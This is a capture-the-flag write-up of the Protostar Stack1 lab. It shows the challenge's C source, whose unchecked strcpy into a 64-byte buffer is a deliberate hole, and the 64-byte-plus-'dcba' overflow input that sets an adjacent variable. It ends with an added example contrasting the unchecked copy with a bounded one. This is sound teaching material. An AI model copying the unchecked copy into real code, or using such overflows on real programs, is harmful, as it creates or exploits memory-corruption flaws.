Protostar Stack1

Here are the instructions for the challenge:

About
This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

This level is at /opt/protostar/bin/stack1

Hints

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
Protostar is little endian

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}


I won’t go into quite as much detail on this challenge. The C source code just sets up a local variable called ‘modified’, sets up a character array called ‘buffer’ that is 64 characters long, then checks to make sure that the program was called with one argument. Next it uses strcpy to copy the argument into the character array. Finally it checks if the value of modified has been changed.

This is very similar to the last challenge. The only difference is that modified needs to be set to an exact value to win. Line 18 says modified needs to be 0x61626364. Using an ASCII table I can see that hex 61 is lowercase a, 62 is lowercase b, 63 is lowercase c and 64 is lowercase d.

I assume that I can overrun the 64 byte buffer just like I did last time. Then I place my abcd after the 64 characters.

./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAabcd
Try again, you got 0x64636261

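But why is my string backwards? It’s because Protostar is little endian: a multi-byte integer is stored with its least significant byte at the lowest address, so the bytes a, b, c, d in memory read back as 0x64636261.
I just switch my abcd around to dcba and try again.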

./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba
you have correctly got the variable to the right value

Perfect!
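The byte-order effect above, modelled as an added example (not part of the original post or the Protostar source), with a bounded copy next to the unchecked one for comparison. It assumes `modified` sits directly after `buffer`, which matches the output shown above; the struct and the names `le32`, `copy_unchecked`, `copy_bounded` and `demo` are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define BUF_LEN 64

/* Assumed model of the frame: modified sits directly after buffer. */
struct frame {
    char    buffer[BUF_LEN];
    uint8_t modified[4];            /* raw bytes of the int */
};

/* Decode 4 bytes as a little-endian CPU does: lowest address = least significant. */
static uint32_t le32(const uint8_t *b) {
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 |
           (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* Mimics strcpy's missing length check; clamped to the model so the demo is well-defined. */
uint32_t copy_unchecked(const char *arg) {
    struct frame f = { {0}, {0} };
    size_t n = strlen(arg);
    if (n > sizeof f) n = sizeof f;
    memcpy(&f, arg, n);             /* bytes past 64 land in modified */
    return le32(f.modified);
}

/* Hardened copy: truncate to the buffer and always NUL-terminate. */
uint32_t copy_bounded(const char *arg) {
    struct frame f = { {0}, {0} };
    size_t n = strlen(arg);
    if (n >= BUF_LEN) n = BUF_LEN - 1;
    memcpy(f.buffer, arg, n);
    f.buffer[n] = '\0';
    return le32(f.modified);
}

/* Constructed input: 64 filler bytes followed by a tail of exactly 4 characters. */
uint32_t demo(const char *tail, int bounded) {
    char arg[BUF_LEN + 5];
    memset(arg, 'A', BUF_LEN);
    memcpy(arg + BUF_LEN, tail, 5); /* 4 characters plus the terminating NUL */
    return bounded ? copy_bounded(arg) : copy_unchecked(arg);
}

int main(void) {
    printf("abcd: 0x%08x  dcba: 0x%08x  dcba bounded: 0x%08x\n", (unsigned)demo("abcd", 0),
           (unsigned)demo("dcba", 0), (unsigned)demo("dcba", 1));
    return 0;
}
```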
